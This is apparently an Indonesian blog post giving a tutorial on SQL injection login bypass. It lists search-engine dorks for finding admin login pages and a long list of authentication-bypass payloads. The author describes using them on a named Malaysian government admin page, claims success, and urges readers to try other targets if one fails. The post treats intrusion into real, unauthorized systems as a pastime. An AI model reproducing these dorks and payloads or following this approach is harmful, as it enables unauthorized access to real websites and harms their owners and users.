Sql Injection Bypass

13/01/14

Di kesempatan kali ini , ane akan posting trik lama n sangat jadul banget buat tutor semacam ini tp boleh jg nich . . Big Grin
Buat ngisi waktu luang nih ..
Banyak loh yang ngomong, jadi HACKER itu tidak instan kayak mie instant Surrenders , butuh kesabaran , blablabla..
( males bacot ) Tongue
langsung aja ye,,... Tongue

DORK :
login | logon
inurl:"/admin/ site:
inurl:"/admin/ intext:"login" site:
inurl:"/admin/login.php site:
inurl:"/admin/login.php intext:"login" site:
intitle:"admin login" site:
DLL, (dork bisa di kembangkan)

Injectsi login::
' OR 1=1 --
' OR 1=1
' OR '1'='1'
' OR 'a' = 'a
' or 0=0 #
' or 'x'='x
' or a=a--
'or'1=1'
' or 0=0 --
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
') or ('a'='a
' or 1=1--
' or 'x'='x
' or 0=0 #
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
==
and 1=1--
and 1=1
1') and '1'='1--
admin' --
admin' #
admin'/*
) or '1'='1--
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
" or 1=1--
" or 0=0 #
") or ("a"="a
" OR 1=1
" OR "1"="1
1' OR 1=1
1' OR '1'='1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
or 0=0 #
or 0=0 --
or 0=0 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Ini hanya trik,, sebagai percoba'an..
OK kali ini gua akn menggunakan live target::
menggunakan dork: inurl:"/admin/login.php intext:"login" site:gov.my Big Grin Big Grin
setelah coba mencoba.. nemu target ini : http://www.marine.gov.my/jlm/admin.asp
saya menggunakan injeksi ini OR 1=1 --
Kebetulan langsung tembus Big GrinBig GrinBig Grin


"Ma'af , Screen shot tiba2 hilang" gk tau kanapa tiba2 hilang , Mungkin dr pihak malay mengetahui ..


Ingat!!: Try n try again,, kegagalan adalah keberhasilan yang tertunda, jika waktu kita injeksi kode tersebut kluar query kyak gni/ data base eror : EROR: syntax eror at ornear bla, bla bla , on line::
Ato kyak gni : your mysql syntax eror bla, bla, bla, yang menunjukkan tanda2 sqL inject..
knp bs begitu?
Itu karena query yg saya masukkan tidak sama dgn kodingan form login tsb.. Complaint
Dgn error kyk gitu, itu menunjukkan bhwa Web tsb Vuln SQL injection bypass


Itu silakan coba beberapa kode injektnya,, kalo gk berhasil cari target lain ..
Cman sekedar trik yha prenn. thanks for watching..
Diposting oleh Unknown At 15:16
Label: ,

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

~INDONESIA~Ku

Followers

IP